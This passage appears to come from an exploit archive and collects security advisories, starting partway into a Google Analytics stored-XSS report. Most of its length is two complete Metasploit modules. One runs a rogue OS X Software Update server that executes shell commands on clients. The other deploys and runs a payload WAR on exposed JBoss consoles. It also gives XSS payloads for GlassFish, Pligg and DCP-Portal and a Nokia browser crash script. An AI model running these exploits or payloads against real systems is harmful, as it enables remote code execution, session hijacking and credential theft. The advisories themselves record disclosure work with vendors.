stChange("drilldown","/search.asp?keyword=test</a>
== Exploit Description - Victim ==
The victim logs into Google Analytics service. The
login page redirects the user to:
https://www.google.com/analytics/settings/
The user clicks on the View Reports for its website
(which was attacked with the injection described
above).
The user is redirected to a similar URL:
https://www.google.com/analytics/reporting/?reset=1&id
=xxxxxxx&scid=yyyyyyy
The user accesses the Content Overview section and
clicks on one of the listed pages. The user is then
redirected to a similar URL (in this example, the user
clicked on index.html):
https://www.google.com/analytics/reporting/content_det
ail?id=xxxxxxx&pdr=20080726-20080825&cmp=average&d1=%2
Findex.html
In the Content Detail page for index.html, an
Ajax-based menu lists the most visited pages and their
relative page views.
When the user clicks on the link of the page which was
attacked, the browser executes the injected payload
from the google.com domain.
Eventually, the user is redirected to the Content
Detail page for the search.asp?keyword=test entry. No
JavaScript errors are returned to the JavaScript
console.
== Impact ==
Cross Site Scripting attacks can be used in
combination with a browser exploitation framework such
as BeEF, Browser Rider, Metasploit browser exploits,
Backweb, Anehta, XSS Proxy and Backframe. These
frameworks allow for complex JavaScript and
browser-based exploit development.
Other potential impacts include:
* Hijacking users browser session;
* Capturing sensitive information viewed by Google
Analytics users;
* Defacement of the Google Analytics website;
* Port scanning of internal user hosts;
* Directed delivery of additional browser-based
exploits, such as ActiveX or URI handler exploits
== Solution ==
Security-Assessment.com follows responsible disclosure
and promptly contacted Google when the issue was first
discovered. First contact with the vendor was made on
the 25th August 2008. Confirmation of the
vulnerability was made by Google on the 4th September
2008.
On the 3rd December 2008, Google communicated to
Security-Assessment.com that Google Analytics has been
fixed. Security-Assessment.com performed a regression
test on the same attack vector and confirmed the issue
has been resolved.
== Credit ==
Discovered and advised to Google Inc.
August 2008 by Roberto Suggi Liverani of
Security-Assessment.com
Personal Page: http://malerisch.net
== Greetings ==
Hello SA guys,
Really L00king forward 'Hacking In The Sun'!!! ;-)
== About Security-Assessment.com ==
Security-Assessment.com is a New Zealand based world
leader in web application testing, network security
and penetration testing. Our clients include some of
the largest globally recognised companies in areas
such as finance, telecommunications, broadcasting,
legal and government. Our aim is to provide the very
best independent advice and a high level of technical
expertise while creating long and lasting professional
relationships with our clients.
Security-Assessment.com is committed to security
research and development, and its team continues to
identify and responsibly publish vulnerabilities in
public and private software vendor's products. Members
of the Security-Assessment.com R&D team are globally
recognised through their release of whitepapers and
presentations related to new security research.
For further information on this issue or any of our
service offerings, contact us
Web Site: www.security-assessment.com
Roberto Suggi Liverani
Security-Assessment.com
Google Analytics suffers from a stored cross site scripting vulnerability.
Moritz Jodeit/appleupdate-exec.txt ( na)
---------------------------------------------------------------------
Apple Mac OS X Software Update Remote Command Execution Vulnerability
Copyright (c) 2007 Moritz Jodeit <moritz@jodeit.org> (2007/12/17)
---------------------------------------------------------------------
I. Vulnerability Description
The OS X Software Update mechanism uses so called `distribution packages' [1],
which basically consist of two parts. The XML `catalog file', which lists the
available updates and the `distribution definition files' [1], which contain
information encoded in XML and JavaScript, defining every aspect of the
user experience, when installing an update.
When OS X checks for new updates, it first contacts swscan.apple.com
to receive the XML catalog file. This file references the distribution
definition files, which can reside on another server. Software Update
receives these files and calls some of the JavaScript functions to check,
if the update is suited for the local machine.
The catalog file and the distribution definition files are both received
using HTTP whithout any authentication. By running a malicious update server,
it is possible to provide distribution definition files, which execute
arbitrary commands using JavaScript on the remote machine requesting the
update. The System.run() method can be used for this, if the
`allow-external-scripts' option was set in the distribution definition
file, as documented in the "Installer JavaScript Reference" [2].
[1] http://developer.apple.com/documentation/DeveloperTools/Reference/DistributionDefinitionRef/
[2] http://developer.apple.com/documentation/DeveloperTools/Reference/InstallerJavaScriptRef/
II. Impact
Combined with the ability to intercept requests to the official Apple update
server by other means like ARP or DNS spoofing, it is possible to execute
arbitrary commands on all clients requesting updates. OS X automatically
checks for updates at regular intervals (default is weekly), which allows
for exploitation, even without any user intervention.
III. Solution
This vulnerability was fixed with the latest Apple update APPLE-SA-2007-12-17.
IV. Vendor Response
2007/12/06 Initial contact with <product-security@apple.com>
2007/12/06 Acknowledgement of received report
2007/12/12 Agreement on public release date
2007/12/17 Coordinated release of updates and advisory
V. Proof Of Concept
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##
require 'msf/core'
module Msf
class Exploits::Osx::Browser::Software_Update < Msf::Exploit::Remote
include Exploit::Remote::HttpServer::HTML
def initialize(info = {})
super(update_info(info,
'Name' => 'Apple OS X Software Update Command Execution',
'Description' => %q{
This module exploits a feature in the Distribution Packages,
which are used in the Apple Software Update mechanism. This feature
allows for arbitrary command execution through JavaScript. This exploit
provides the malicious update server. Requests must be redirected to
this server by other means for this exploit to work.
},
'Author' => [ 'Moritz Jodeit <moritz@jodeit.org>' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
['CVE', '2007-5863'],
],
'Payload' =>
{
'BadChars' => "\x00",
'DisableNops' => true,
},
'Platform' => 'osx',
'Targets' =>
[
[
'Automatic',
{
'Platform' => [ 'unix' ],
'Arch' => ARCH_CMD,
},
],
],
'DisclosureDate' => 'Dec 17 2007',
'DefaultTarget' => 0))
register_options(
[
OptPort.new('SRVPORT', [ true, "The local port to listen on.", 80 ]),
OptString.new('URIPATH', [ true, "The URI to use for this exploit.", "/" ])
], self.class)
end
# Encode some characters using character entity references and escape
# any quotation characters, by splitting the string into multiple parts.
def encode_payload(payload)
encoded = payload.gsub(/[&<>"']/) do |s|
case s
when '&': "&"
when '<': "<"
when '>': ">"
when '"': '"+\'"\'+"'
when '\'': "'"
end
end
return '"' + encoded + '"'
end
# Generate the initial catalog file with references to the
# distribution script, which does the actual exploitation.
def generate_catalog(server)
languages = [ "", "Dutsch", "English", "French", "German", "Italian", "Japanese",
"Spanish", "da", "fi", "ko", "no", "pt", "sv", "zh_CN", "zh_TW" ]
productkey = rand_text_numeric(3) + "-" + rand_text_numeric(4)
distfile = rand_text_alpha(8) + ".dist"
sucatalog = '<?xml version="1.0" encoding="UTF-8"?>'
sucatalog << '<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">'
sucatalog << '<plist version="1.0">'
sucatalog << '<dict>'
sucatalog << '<key>Products</key><dict>'
sucatalog << "<key>#{productkey}</key><dict>"
sucatalog << '<key>Distributions</key><dict>'
languages.each do |l|
sucatalog << "<key>#{l}</key><string>http://#{server}/#{distfile}</string>\n"
end
sucatalog << '</dict></dict></dict></dict></plist>'
return sucatalog
end
# Generate distribution script, which calls our payload using JavaScript.
def generate_dist(payload)
func = rand_text_alpha(8)
dist = '<?xml version="1.0" encoding="UTF-8"?>'
dist << "<installer-gui-script minSpecVersion='1'>"
dist << '<options allow-external-scripts = "yes"/>'
dist << "<choices-outline ui='SoftwareUpdate'>"
dist << "<line choice='su'/>"
dist << "</choices-outline>"
dist << "<choice id='su' visible ='#{func}()'/>"
dist << "<script>"
dist << "function #{func}() { system.run('/bin/bash', '-c', #{encode_payload(payload)}); }"
dist << "</script>"
dist << "</installer-gui-script>"
return dist
end
def on_request_uri(cli, request)
date = Time.now
server = "swscan.apple.com"
header = {
'Content-Type' => 'text/plain',
'Last-Modified' => date,
'Date' => date,
}
if request.uri =~ /\.sucatalog$/
print_status("Sending initial distribution package to #{cli.peerhost}:#{cli.peerport}")
body = generate_catalog(server)
elsif request.uri =~ /\.dist$/
print_status("Sending distribution script to #{cli.peerhost}:#{cli.peerport}")
return if ((p = regenerate_payload(cli)) == nil)
body = generate_dist(p.encoded)
else
return
end
send_response(cli, body, header)
handler(cli)
end
end
end
Apple Mac OS X Software Update suffers from a remote command execution vulnerability. Full Metasploit module included.
metasploit/JBoss JMX Console Deployer Upload and Execute ( multiple)
##
# $Id: jboss_maindeployer.rb 10754 2010-10-19 22:24:33Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
HttpFingerprint = { :pattern => [ /(Jetty|JBoss)/ ] }
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::HttpServer
include Msf::Exploit::EXE
def initialize(info = {})
super(update_info(info,
'Name' => 'JBoss JMX Console Deployer Upload and Execute',
'Description' => %q{
This module can be used to execute a payload on JBoss servers that have
an exposed "jmx-console" application. The payload is put on the server by
using the jboss.system:MainDeployer functionality. To accomplish this, a
temporary HTTP server is created to serve a WAR archive containing our
payload. This method will only work if the target server allows outbound
connections to us.
},
'Author' => [ 'jduck', 'Patrick Hof' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 10754 $',
'References' =>
[
[ 'CVE', '2007-1036' ],
[ 'CVE', '2010-0738' ], # by using VERB other than GET/POST
[ 'OSVDB', '33744' ],
[ 'URL', 'http://www.redteam-pentesting.de/publications/jboss' ]
],
'Privileged' => true,
'Platform' => [ 'win', 'linux' ],
'Stance' => Msf::Exploit::Stance::Aggressive,
'Targets' =>
[
#
# detect via /manager/serverinfo
#
[ 'Automatic', { } ],
#
# Platform specific targets only
#
[ 'Windows Universal',
{
'Arch' => ARCH_X86,
'Platform' => 'win'
},
],
[ 'Linux Universal',
{
'Arch' => ARCH_X86,
'Platform' => 'linux'
},
],
#
# Java version
#
[ 'Java Universal',
{
'Arch' => ARCH_JAVA,
'Payload' =>
{
'DisableNops' => true
}
}
]
],
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(8080),
OptString.new('USERNAME', [ false, 'The username to authenticate as' ]),
OptString.new('PASSWORD', [ false, 'The password for the specified username' ]),
OptString.new('SHELL', [ false, 'The system shell to use', 'automatic' ]),
OptString.new('JSP', [ false, 'JSP name to use without .jsp extension (default: random)', nil ]),
OptString.new('APPBASE', [ false, 'Application base name, (default: random)', nil ]),
OptString.new('PATH', [ true, 'The URI path of the console', '/jmx-console' ]),
OptString.new('VERB', [ true, 'The HTTP verb to use (for CVE-2010-0738)', 'POST' ]),
OptString.new('WARHOST', [ false, 'The host to request the WAR payload from' ]),
], self.class)
end
def auto_target
print_status("Attempting to automatically select a target...")
if not (plat = detect_platform())
raise RuntimeError, 'Unable to detect platform!'
end
# TODO: detection requires HTML parsing
arch = ARCH_X86
# see if we have a match
targets.each { |t|
if (t['Platform'] == plat) and (t['Arch'] == arch)
return t
end
}
# no matching target found
return nil
end
def exploit
datastore['BasicAuthUser'] = datastore['USERNAME']
datastore['BasicAuthPass'] = datastore['PASSWORD']
jsp_name = datastore['JSP'] || rand_text_alphanumeric(8+rand(8))
app_base = datastore['APPBASE'] || rand_text_alphanumeric(8+rand(8))
verb = 'GET'
if (datastore['VERB'] != 'GET' and datastore['VERB'] != 'POST')
verb = 'HEAD'
end
mytarget = target
if (target.name =~ /Automatic/)
mytarget = auto_target()
if (not mytarget)
raise RuntimeError, "Unable to automatically select a target"
end
print_status("Automatically selected target \"#{mytarget.name}\"")
else
print_status("Using manually select target \"#{mytarget.name}\"")
end
arch = mytarget.arch
# Find out which shell if we're using a Java target
if (mytarget.name =~ /Java/)
if not (plat = detect_platform())
raise RuntimeError, 'Unable to detect platform!'
end
case plat
when 'linux'
datastore['SHELL'] = '/bin/sh'
when 'win'
datastore['SHELL'] = 'cmd.exe'
end
print_status("SHELL set to #{datastore['SHELL']}")
else
# set arch/platform from the target
plat = [Msf::Module::PlatformList.new(mytarget['Platform']).platforms[0]]
end
# We must regenerate the payload in case our auto-magic changed something.
return if ((p = exploit_regenerate_payload(plat, arch)) == nil)
# Generate the WAR containing the payload
if (mytarget.name =~ /Java/)
@war_data = Msf::Util::EXE.to_war(p.encoded,
{
:app_name => app_base,
:jsp_name => jsp_name
})
else
exe = generate_payload_exe(
{
:code => p.encoded,
:arch => arch,
:platform => plat
})
@war_data = Msf::Util::EXE.to_jsp_war(exe,
{
:app_name => app_base,
:jsp_name => jsp_name
})
end
#
# UPLOAD
#
resource_uri = '/' + app_base + '.war'
service_url = 'http://' + datastore['SRVHOST'] + ':' + datastore['SRVPORT'] + resource_uri
print_status("Starting up our web service on #{service_url} ...")
start_service({'Uri' => {
'Proc' => Proc.new { |cli, req|
on_request_uri(cli, req)
},
'Path' => resource_uri
}})
if (datastore['WARHOST'])
service_url = 'http://' + datastore['WARHOST'] + ':' + datastore['SRVPORT'] + resource_uri
end
print_status("Asking the JBoss server to deploy (via MainDeployer) #{service_url}")
if (verb == "POST")
res = send_request_cgi({
'method' => verb,
'uri' => datastore['PATH'] + '/HtmlAdaptor',
'vars_post' =>
{
'action' => 'invokeOpByName',
'name' => 'jboss.system:service=MainDeployer',
'methodName' => 'deploy',
'argType' => 'java.lang.String',
'arg0' => service_url
}
})
else
res = send_request_cgi({
'method' => verb,
'uri' => datastore['PATH'] + '/HtmlAdaptor',
'vars_get' =>
{
'action' => 'invokeOpByName',
'name' => 'jboss.system:service=MainDeployer',
'methodName' => 'deploy',
'argType' => 'java.lang.String',
'arg0' => service_url
}
})
end
if (! res)
raise RuntimeError, "Unable to deploy WAR archive [No Response]"
end
if (res.code < 200 or res.code >= 300)
case res.code
when 401
print_error("Warning: The web site asked for authentication: #{res.headers['WWW-Authenticate'] || res.headers['Authentication']}")
end
raise RuntimeError, "Upload to deploy WAR archive [#{res.code} #{res.message}]"
end
# wait for the data to be sent
print_status("Waiting for the server to request the WAR archive....")
waited = 0
while (not @war_sent)
select(nil, nil, nil, 1)
waited += 1
if (waited > 30)
raise RuntimeError, 'Server did not request WAR archive -- Maybe it cant connect back to us?'
end
end
print_status("Shutting down the web service...")
stop_service
#
# EXECUTE
#
print_status("Executing #{app_base}...")
# JBoss might need some time for the deployment. Try 5 times at most and
# wait 3 seconds inbetween tries
num_attempts = 5
num_attempts.times { |attempt|
res = send_request_cgi({
'uri' => '/' + app_base + '/' + jsp_name + '.jsp',
'method' => verb
}, 20)
msg = nil
if (! res)
msg = "Execution failed on #{app_base} [No Response]"
elsif (res.code < 200 or res.code >= 300)
msg = "Execution failed on #{app_base} [#{res.code} #{res.message}]"
elsif (res.code == 200)
print_good("Successfully triggered payload at '#{uri}'")
break
end
if (attempt < num_attempts - 1)
msg << ", retrying in 3 seconds..."
print_error(msg)
select(nil, nil, nil, 3)
else
print_error(msg)
end
}
#
# DELETE
#
# XXX: Does undeploy have an invokeByName?
#
print_status("Undeploying #{app_base} ...")
res = send_request_cgi({
'method' => verb,
'uri' => datastore['PATH'] + '/HtmlAdaptor',
'vars_post' =>
{
'action' => 'invokeOpByName',
'name' => 'jboss.system:service=MainDeployer',
'methodName' => 'methodName=undeploy',
'argType' => 'java.lang.String',
'arg0' => app_base
}
}, 20)
if (! res)
print_error("WARNING: Undeployment failed on #{app_base} [No Response]")
elsif (res.code < 200 or res.code >= 300)
print_error("WARNING: Undeployment failed on #{app_base} [#{res.code} #{res.message}]")
end
handler
end
# Handle incoming requests from the server
def on_request_uri(cli, request)
#print_status("on_request_uri called: #{request.inspect}")
if (not @war_data)
print_error("A request came in, but the WAR archive wasn't ready yet!")
return
end
print_status("Sending the WAR archive to the server...")
send_response(cli, @war_data)
@war_sent = true
end
# Try to autodetect the target platform
def detect_platform()
print_status("Attempting to automatically detect the platform...")
path = datastore['PATH'] + '/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo'
res = send_request_raw(
{
'uri' => path
}, 20)
if (not res) or (res.code != 200)
print_error("Failed: Error requesting #{path}")
return nil
end
if (res.body =~ /<td.*?OSName.*?(Linux|Windows).*?<\/td>/m)
os = $1
if (os =~ /Linux/i)
return 'linux'
elsif (os =~ /Windows/i)
return 'win'
end
end
nil
end
end
Sense of Security/Oracle Sun GlassFish Enterprise Server Stored XSS Vulnerability ( jsp)
Sense of Security - Security Advisory - SOS-11-009
Release Date. 19-Jul-2011
Last Update. -
Vendor Notification Date. 23-Mar-2011
Product. Oracle Sun GlassFish Enterprise
Server
Platform. Java EE
Affected versions. 2.1.1 ((v2.1 Patch06)(9.1_02 Patch12))
(build b31g-fcs) verified and possibly
others
Severity Rating. Medium
Impact. Cookie/credential theft, impersonation,
loss of confidentiality, client-side
code execution
Attack Vector. Remote without authentication
Solution Status. Vendor patch
CVE reference. CVE-2011-2260
Oracle Bug ID. 7030596
Details.
GlassFish is an open source application server project led by Sun
Microsystems for the Java EE platform. The proprietary version is
called Sun GlassFish Enterprise Server. GlassFish supports all Java EE
API specifications, such as JDBC, RMI, e-mail, JMS, web services, XML,
etc, and defines how to coordinate them.
Stored:
The log viewer fails to securely output encode logged values. As a
result, an unauthenticated attacker can trigger the application to log
a malicious string by entering the values into the username field. This
will cause the application to log the incorrect login attempt and
results in a stored XSS vulnerability. When an administrator logs into
the application and views the log, the malicious code will be executed
in the client browser. As an example, navigate to:
http://[host]:4848
Enter the below into the login field:
'>\"><script>alert(3);</script>
When the user views the \"Search Log Files\" page, the above client-side
code will be executed in the client browser. The offending script is
http://[host]:4848/logViewer/logViewer.jsf
Reflected:
By modifying the windowTitle or helpFile variables of
/com_sun_webui_jsf/help/helpwindow.jsf it is possible to trigger a
reflected XSS vulnerability. An example is shown below:
/com_sun_webui_jsf/help/helpwindow.jsf?&windowTitle=Help+Window'>\">
<script>alert(1);</script>&helpFile=commontask.html
/com_sun_webui_jsf/help/helpwindow.jsf?&windowTitle=Help+Window&
helpFile=commontask.html'>\"><script>alert(1);</script>
Solution.
Apply the vendor patch.
Discovered by.
Sense of Security Labs.
About us.
Sense of Security is a leading provider of information
security and risk management solutions. Our team has expert
skills in assessment and assurance, strategy and architecture,
and deployment through to ongoing management. We are
Australia's premier application penetration testing firm and
trusted IT security advisor to many of the country's largest
organisations.
Sense of Security Pty Ltd
Level 8, 66 King St
Sydney NSW 2000
AUSTRALIA
T: +61 (0)2 9290 4444
F: +61 (0)2 9290 4455
W: http://www.senseofsecurity.com.au/consulting/penetration-testing
E: info@senseofsecurity.com.au
Twitter: @ITsecurityAU
The latest version of this advisory can be found at:
http://www.senseofsecurity.com.au/advisories/SOS-11-009.pdf
ikki/Nokia Mini Map Browser (array sort) Silent Crash Vulnerability ( hardware)
====================================================
Security Research Advisory
Vulnerability name: Nokia Browser Array Sort Denial Of Service Vulnerability
Advisory number: LC-2008-04
Advisory URL: http://www.ikkisoft.com
====================================================
1) Affected Software
* Nokia Mini Map Browser (S60WebKit <= 21772)
The tested device has the following User-Agent:
Mozilla/5.0 (SymbianOS/9.2;U;Series60/3.1 NokiaE90-1/210.34.75
Profile/MIDP-2.0 Configuration/CLDC-1.1) AppleWebKit/413 (KHTML)
Safari/413
Note: Although the Nokia Web Browser is built upon a port of the
open source WebKit used by Apple for its browser, the iPhone is not
affected (at least the iPhone firmware version 2.0.2(5C1))
====================================================
2) Severity
Severity: Low
Local/Remote: Remote
====================================================
3) Summary
The Web Browser for S60 (formally called Nokia Mini Map Browser) is a web
browser for the S60 mobile phone platform developed by Nokia.
It is built upon S60WebKit, a port of the open source WebKit project to the S60
platform. According to several sources, the S60 software on Symbian OS is the
world’s most popular software for smartphones.
This version of the Nokia Mini Map Browser does not properly validate JavaScript
input embedded in visited HTML pages. An aggressor can easily trigger Denial of
Service attacks.
References:
http://opensource.nokia.com/projects/S60browser/
http://en.wikipedia.org/wiki/Web_Browser_for_S60
====================================================
4) Vulnerability Details
The Nokia Mini Map Browser is prone to a vulnerability that may result in the
application silent crash. Arbitrary code execution is probably not possible.
The problem arises in the JavaScript core of the S60WebKit, invoking the sort()
function on a recursive array.
A similar behavior was observed some years ago in several browsers due to
the common code base (BID-12331, BID-11762, BID-11760, BID-11759,
BID-11752).
====================================================
5) Exploit
Embed in an HTML page the following JavaScript:
<script>
foo = new Array();
while(true) {foo = new Array(foo).sort();}
</script>
====================================================
6) Fix Information
n/a
====================================================
7) Time Table
08/09/2008 - Vendor notified.
15/09/2008 - Vendor response.
??/??/???? - Vendor patch release.
10/10/2008 - Public disclosure.
====================================================
8) Credits
Discovered by Luca Carettoni - luca.carettoni[at]ikkisoft[dot]com
====================================================
9) Legal Notices
The information in the advisory is believed to be accurate at the time of
publishing based on currently available information.
This information is provided as-is, as a free service to the community.
There are no warranties with regard to this information.
The author does not accept any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.
Permission is hereby granted for the redistribution of this alert, provided
that the content is not altered in any way, except reformatting, and that due
credit is given.
This vulnerability has been disclosed in accordance with the RFP
Full-Disclosure Policy v2.0, available at:
http://www.wiretrip.net/rfp/policy.html
====================================================
# milw0rm.com [2008-10-10]
/Oracle Sun GlassFish Enterprise Server 2.1.1 Cross Site Scripting ( na)
Sense of Security - Security Advisory - SOS-11-009
Release Date. 19-Jul-2011
Last Update. -
Vendor Notification Date. 23-Mar-2011
Product. Oracle Sun GlassFish Enterprise
Server
Platform. Java EE
Affected versions. 2.1.1 ((v2.1 Patch06)(9.1_02 Patch12))
(build b31g-fcs) verified and possibly
others
Severity Rating. Medium
Impact. Cookie/credential theft, impersonation,
loss of confidentiality, client-side
code execution
Attack Vector. Remote without authentication
Solution Status. Vendor patch
CVE reference. CVE-2011-2260
Oracle Bug ID. 7030596
Details.
GlassFish is an open source application server project led by Sun
Microsystems for the Java EE platform. The proprietary version is
called Sun GlassFish Enterprise Server. GlassFish supports all Java EE
API specifications, such as JDBC, RMI, e-mail, JMS, web services, XML,
etc, and defines how to coordinate them.
Stored:
The log viewer fails to securely output encode logged values. As a
result, an unauthenticated attacker can trigger the application to log
a malicious string by entering the values into the username field. This
will cause the application to log the incorrect login attempt and
results in a stored XSS vulnerability. When an administrator logs into
the application and views the log, the malicious code will be executed
in the client browser. As an example, navigate to:
http://[host]:4848
Enter the below into the login field:
'>\"><script>alert(3);</script>
When the user views the \"Search Log Files\" page, the above client-side
code will be executed in the client browser. The offending script is
http://[host]:4848/logViewer/logViewer.jsf
Reflected:
By modifying the windowTitle or helpFile variables of
/com_sun_webui_jsf/help/helpwindow.jsf it is possible to trigger a
reflected XSS vulnerability. An example is shown below:
/com_sun_webui_jsf/help/helpwindow.jsf?&windowTitle=Help+Window'>\">
<script>alert(1);</script>&helpFile=commontask.html
/com_sun_webui_jsf/help/helpwindow.jsf?&windowTitle=Help+Window&
helpFile=commontask.html'>\"><script>alert(1);</script>
Solution.
Apply the vendor patch.
Discovered by.
Sense of Security Labs.
About us.
Sense of Security is a leading provider of information
security and risk management solutions. Our team has expert
skills in assessment and assurance, strategy and architecture,
and deployment through to ongoing management. We are
Australia's premier application penetration testing firm and
trusted IT security advisor to many of the country's largest
organisations.
Sense of Security Pty Ltd
Level 8, 66 King St
Sydney NSW 2000
AUSTRALIA
T: +61 (0)2 9290 4444
F: +61 (0)2 9290 4455
W: http://www.senseofsecurity.com.au
E: info@senseofsecurity.com.au
Twitter: @ITsecurityAU
The latest version of this advisory can be found at:
http://www.senseofsecurity.com.au/advisories/SOS-11-009.pdf
Oracle Sun GlassFish Enterprise Server version 2.1.1 suffers from a cross site scripting vulnerability. Proof of concept code included.
Andrei Rimsa Alvares/Pligg CMS 1.0.4 Cross Site Scripting ( na)
Title: Pligg Installation File XSS Vulnerability Vendor: Pligg Product: Pligg CMS Tested Version: 1.0.4 Threat Class: XSS Severity: Medium Remote: yes Local: no Discovered By: Andrei Rimsa Alvares ===== Description ===== Pligg is prone to a XSS vulnerability in the installation file: install/install1.php. The variable "language" - obtained from an http request - can be manipulated to execute java script code via onmouseover like functions. Even with the two sanitizers used (strip_tags and addslashes) it is possible to bypass the double quote jail of the value field in the input tag by passing a double quote via the "language" variable. ----- install/install1.php ----- 20: ----- install/install1.php ----- The sanitizer strip_tags prevents new tags to be used (like ) but it does not filter onmouseover type attacks. Addslashes inserts backslashes to escape special characters like double quote, but since html does not process escape sequences this sanitizer is useless to prevent breaking the double quote jail - regardless of magic_quotes is enabled or not. ===== Impact ===== Malicious java script code can be executed in the context of the affected web site. ===== Proof of Concept ===== A simple proof of concept demonstrating the double quote jail by passing is shown below. However, this attack is not exploitable because the input field is hidden. http://target/install/install1.php?language=%22%20onmouseover=alert()%3E To overcome this limitation and provided a real case attack scenario, we used a technique obtained from [1]. This attack attempts to increase the area of the affected input field to cover the whole screen. Once the mouse is moved anywhere on the screen, the onmouseover java script can be triggered to execute the malicious code. In this proof of concept, an alert containing the message "XSS" should be shown on the screen in case of mouse movement. http://target/install/install1.php?language=%22%20style=a:b;margin-top:-1000px;margin-left:-100px;width:4000px;height:4000px;display:block;%20onmouseover=alert%28String.fromCharCode%2888,83,83%29%29;%3E This attack venue exploited in this proof of concept had no effect on Google Chrome web browser, but was successfully exploited on Mozilla Firefox and others. ===== Workaround ===== Remove the installation directory after installation, as recommended during installation. ===== Disclosure Timeline ===== June, 16 2010 - Vendor notification. June, 22 2010 - Vendor replied but did not acknowledge the bug. June, 22 2010 - New contact attempted to provide more details about the bug. July, 07 2010 - No vendor reply. Public disclosure. ===== References ===== 1. http://www.packetstormsecurity.org/papers/bypass/workaround-xss.txt 2. http://www.pligg.com _________________________________________________________________ Hotmail: Powerful Free email with security by Microsoft. https://signup.live.com/signup.aspx?id=60969
Pligg CMS version 1.0.4 suffers from a cross site scripting vulnerability.
Andrei Rimsa Alvares/DCP-Portal 7.0 Beta Cross Site Scripting ( na)
Title: DCP-Portal Multiple XSS Vulnerabilities
Vendor: Worxware
Product: DCP-Portal
Tested Version: 7.0beta
Threat Class: XSS
Severity: High
Remote: yes
Local: no
Discovered By: Andrei Rimsa Alvares
===== Description =====
Multiple XSS vulnerabilities found in the DCP-Portal.
1. common/components/editor/insert_image.php, modules/newsletter/insert_image.php, php/editor.php
The variable $upload_failure_report gets user input from http get request variable "Image" when the action of deleting an uploaded file fails. Later this variable is outputted to the page without proper sanitization.
2. modules/gallery/view_img.php
Page title can be modified by changing the http request variable "imgtitle". Since no sanitizer is used, an XSS occurs on line 2.
Another vulnerability exists if magic quotes is turned off. The http request variable "imagename" gets outputted on the java script function document.write between simple quotes on line 27.
3. modules/tips/show_tip.php
Http request variable "newsId" gets outputted to the page without proper sanitization on line 14.
===== Impact =====
Malicious java script code can be executed in the context of the affected web site.
===== Proof of Concept =====
All proof of concepts display a java script alert containing the message "XSS".
1. common/components/editor/insert_image.php, modules/newsletter/insert_image.php, php/editor.php
http://target/common/components/editor/insert_image.php?MyAction=Delete&Image=%3Cscript%3Ewindow.alert(String.fromCharCode(88,83,83));%3C/script%3E
http://target/modules/newsletter/insert_image.php?MyAction=Delete&Image=%3Cscript%3Ewindow.alert(String.fromCharCode(88,83,83));%3C/script%3E
http://target/php/editor.php?MyAction=Delete&Image=%3Cscript%3Ewindow.alert(String.fromCharCode(88,83,83));%3C/script%3E
2. modules/gallery/view_img.php
http://target/modules/gallery/view_img.php?imgtitle=%3C/title%3E%3Cscript%3Ewindow.alert(String.fromCharCode(88,83,83));%3C/script%3E
(requires magic_quotes_gpc = off) http://target/modules/gallery/view_img.php?imagename=%22');window.alert('XSS');document.write('%22
3. modules/tips/show_tip.php
http://target/modules/tips/show_tip.php?newsId=%3Cscript%3Ewindow.alert(String.fromCharCode(88,83,83));%3C/script%3E
===== Workaround =====
No workaround available at the time.
===== Disclosure Timeline =====
June, 16 2010 - Vendor notification.
July, 07 2010 - No vendor reply. Public disclosure.
===== References =====
http://www.dcp-portal.org
http://www.worxware.com
_________________________________________________________________
Hotmail: Trusted email with powerful SPAM protection.
https://signup.live.com/signup.aspx?id=60969
DCP-Portal version 7.0 Beta suffers from a cross site scripting vulnerability.